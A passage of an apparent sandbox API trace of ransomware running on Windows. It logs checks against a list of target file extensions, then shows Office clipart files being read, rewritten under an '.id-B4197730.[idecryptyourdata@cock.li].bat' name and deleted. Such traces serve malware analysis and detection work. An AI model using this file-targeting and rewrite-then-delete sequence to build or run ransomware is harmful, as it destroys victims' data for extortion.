office\\root\\clipart\\pub60cor\\an02724_.wmf")) returned 1 [0062.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0062.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0062.142] lstrlenW (lpString=".doc") returned 4 [0062.142] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.142] lstrlenW (lpString=".docx") returned 5 [0062.142] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.142] lstrlenW (lpString=".pdf") returned 4 [0062.142] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.142] lstrlenW (lpString=".xls") returned 4 [0062.142] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.142] lstrlenW (lpString=".xlsx") returned 5 [0062.142] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.142] lstrlenW (lpString=".ppt") returned 4 [0062.142] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0062.142] lstrlenW (lpString=".zip") returned 4 [0062.142] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.142] lstrlenW (lpString=".rar") returned 4 [0062.142] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.143] lstrlenW (lpString=".bz2") returned 4 [0062.143] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.143] lstrlenW (lpString=".7z") returned 3 [0062.143] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0062.143] lstrlenW (lpString=".dbf") returned 4 [0062.143] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0062.143] lstrlenW (lpString=".1cd") returned 4 [0062.143] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0062.143] lstrlenW (lpString=".jpg") returned 4 [0062.143] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0062.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0062.143] lstrlenW (lpString=".doc") returned 4 [0062.143] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.143] lstrlenW (lpString=".docx") returned 5 [0062.143] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.143] lstrlenW (lpString=".pdf") returned 4 [0062.143] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.143] lstrlenW (lpString=".xls") returned 4 [0062.144] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.144] lstrlenW (lpString=".xlsx") returned 5 [0062.144] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.144] lstrlenW (lpString=".ppt") returned 4 [0062.144] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0062.144] lstrlenW (lpString=".zip") returned 4 [0062.144] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.144] lstrlenW (lpString=".rar") returned 4 [0062.144] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.144] lstrlenW (lpString=".bz2") returned 4 [0062.144] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.144] lstrlenW (lpString=".7z") returned 3 [0062.144] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0062.144] lstrlenW (lpString=".dbf") returned 4 [0062.144] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0062.144] lstrlenW (lpString=".1cd") returned 4 [0062.144] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 68 [0062.144] lstrlenW (lpString=".jpg") returned 4 [0062.144] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.144] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.145] lstrlenW (lpString="AN04134_.WMF") returned 12 [0062.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.145] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=3416) returned 1 [0062.145] CloseHandle (hObject=0x368) returned 1 [0062.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf")) returned 0x220 [0062.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.146] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.146] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.146] GetLastError () returned 0x0 [0062.146] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xd58, lpOverlapped=0x0) returned 1 [0062.315] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xd60, lpOverlapped=0x0) returned 1 [0062.316] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.316] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.316] SetEndOfFile (hFile=0x370) returned 1 [0062.322] CloseHandle (hObject=0x370) returned 1 [0062.323] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.323] SetEndOfFile (hFile=0x368) returned 1 [0062.326] CloseHandle (hObject=0x368) returned 1 [0062.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.326] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf")) returned 1 [0062.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0062.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0062.327] lstrlenW (lpString=".doc") returned 4 [0062.327] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.327] lstrlenW (lpString=".docx") returned 5 [0062.327] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.327] lstrlenW (lpString=".pdf") returned 4 [0062.327] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.327] lstrlenW (lpString=".xls") returned 4 [0062.327] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.327] lstrlenW (lpString=".xlsx") returned 5 [0062.327] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.327] lstrlenW (lpString=".ppt") returned 4 [0062.327] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0062.327] lstrlenW (lpString=".zip") returned 4 [0062.327] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.327] lstrlenW (lpString=".rar") returned 4 [0062.327] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.327] lstrlenW (lpString=".bz2") returned 4 [0062.327] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.327] lstrlenW (lpString=".7z") returned 3 [0062.327] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0062.327] lstrlenW (lpString=".dbf") returned 4 [0062.327] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0062.327] lstrlenW (lpString=".1cd") returned 4 [0062.327] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0062.327] lstrlenW (lpString=".jpg") returned 4 [0062.327] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0062.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0062.328] lstrlenW (lpString=".doc") returned 4 [0062.328] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.328] lstrlenW (lpString=".docx") returned 5 [0062.328] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.328] lstrlenW (lpString=".pdf") returned 4 [0062.328] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.328] lstrlenW (lpString=".xls") returned 4 [0062.328] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.328] lstrlenW (lpString=".xlsx") returned 5 [0062.328] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.328] lstrlenW (lpString=".ppt") returned 4 [0062.328] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0062.328] lstrlenW (lpString=".zip") returned 4 [0062.328] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.328] lstrlenW (lpString=".rar") returned 4 [0062.328] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.328] lstrlenW (lpString=".bz2") returned 4 [0062.328] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.328] lstrlenW (lpString=".7z") returned 3 [0062.328] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0062.328] lstrlenW (lpString=".dbf") returned 4 [0062.328] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0062.328] lstrlenW (lpString=".1cd") returned 4 [0062.328] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0062.328] lstrlenW (lpString=".jpg") returned 4 [0062.328] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.328] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.329] lstrlenW (lpString="AN04225_.WMF") returned 12 [0062.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.329] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=8492) returned 1 [0062.329] CloseHandle (hObject=0x368) returned 1 [0062.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf")) returned 0x220 [0062.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.329] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.329] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.329] GetLastError () returned 0x0 [0062.329] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x212c, lpOverlapped=0x0) returned 1 [0062.375] WriteFile (in: hFile=0x340, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2130, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2130, lpOverlapped=0x0) returned 1 [0062.376] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.376] WriteFile (in: hFile=0x340, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.376] SetEndOfFile (hFile=0x340) returned 1 [0062.377] CloseHandle (hObject=0x340) returned 1 [0062.377] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.377] SetEndOfFile (hFile=0x368) returned 1 [0062.378] CloseHandle (hObject=0x368) returned 1 [0062.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.379] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf")) returned 1 [0062.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0062.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0062.379] lstrlenW (lpString=".doc") returned 4 [0062.379] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.379] lstrlenW (lpString=".docx") returned 5 [0062.379] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.379] lstrlenW (lpString=".pdf") returned 4 [0062.379] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.379] lstrlenW (lpString=".xls") returned 4 [0062.379] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.379] lstrlenW (lpString=".xlsx") returned 5 [0062.379] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.379] lstrlenW (lpString=".ppt") returned 4 [0062.379] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0062.379] lstrlenW (lpString=".zip") returned 4 [0062.379] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.379] lstrlenW (lpString=".rar") returned 4 [0062.379] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.380] lstrlenW (lpString=".bz2") returned 4 [0062.380] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.380] lstrlenW (lpString=".7z") returned 3 [0062.380] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0062.380] lstrlenW (lpString=".dbf") returned 4 [0062.380] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0062.380] lstrlenW (lpString=".1cd") returned 4 [0062.380] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0062.380] lstrlenW (lpString=".jpg") returned 4 [0062.380] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0062.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0062.380] lstrlenW (lpString=".doc") returned 4 [0062.380] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.380] lstrlenW (lpString=".docx") returned 5 [0062.380] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.380] lstrlenW (lpString=".pdf") returned 4 [0062.380] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.380] lstrlenW (lpString=".xls") returned 4 [0062.380] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.380] lstrlenW (lpString=".xlsx") returned 5 [0062.380] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.381] lstrlenW (lpString=".ppt") returned 4 [0062.381] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0062.381] lstrlenW (lpString=".zip") returned 4 [0062.381] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.381] lstrlenW (lpString=".rar") returned 4 [0062.381] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.381] lstrlenW (lpString=".bz2") returned 4 [0062.381] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.381] lstrlenW (lpString=".7z") returned 3 [0062.381] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0062.381] lstrlenW (lpString=".dbf") returned 4 [0062.381] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0062.381] lstrlenW (lpString=".1cd") returned 4 [0062.381] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0062.381] lstrlenW (lpString=".jpg") returned 4 [0062.381] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.381] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.381] lstrlenW (lpString="AN04235_.WMF") returned 12 [0062.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0062.390] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=7804) returned 1 [0062.390] CloseHandle (hObject=0x2c8) returned 1 [0062.390] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf")) returned 0x220 [0062.390] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0062.390] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.390] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.392] GetLastError () returned 0x0 [0062.392] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1e7c, lpOverlapped=0x0) returned 1 [0062.489] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1e80, lpOverlapped=0x0) returned 1 [0062.490] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.490] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.490] SetEndOfFile (hFile=0x370) returned 1 [0062.491] CloseHandle (hObject=0x370) returned 1 [0062.491] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.491] SetEndOfFile (hFile=0x2c8) returned 1 [0062.492] CloseHandle (hObject=0x2c8) returned 1 [0062.492] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.492] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf")) returned 1 [0062.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0062.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0062.493] lstrlenW (lpString=".doc") returned 4 [0062.493] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.493] lstrlenW (lpString=".docx") returned 5 [0062.493] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned 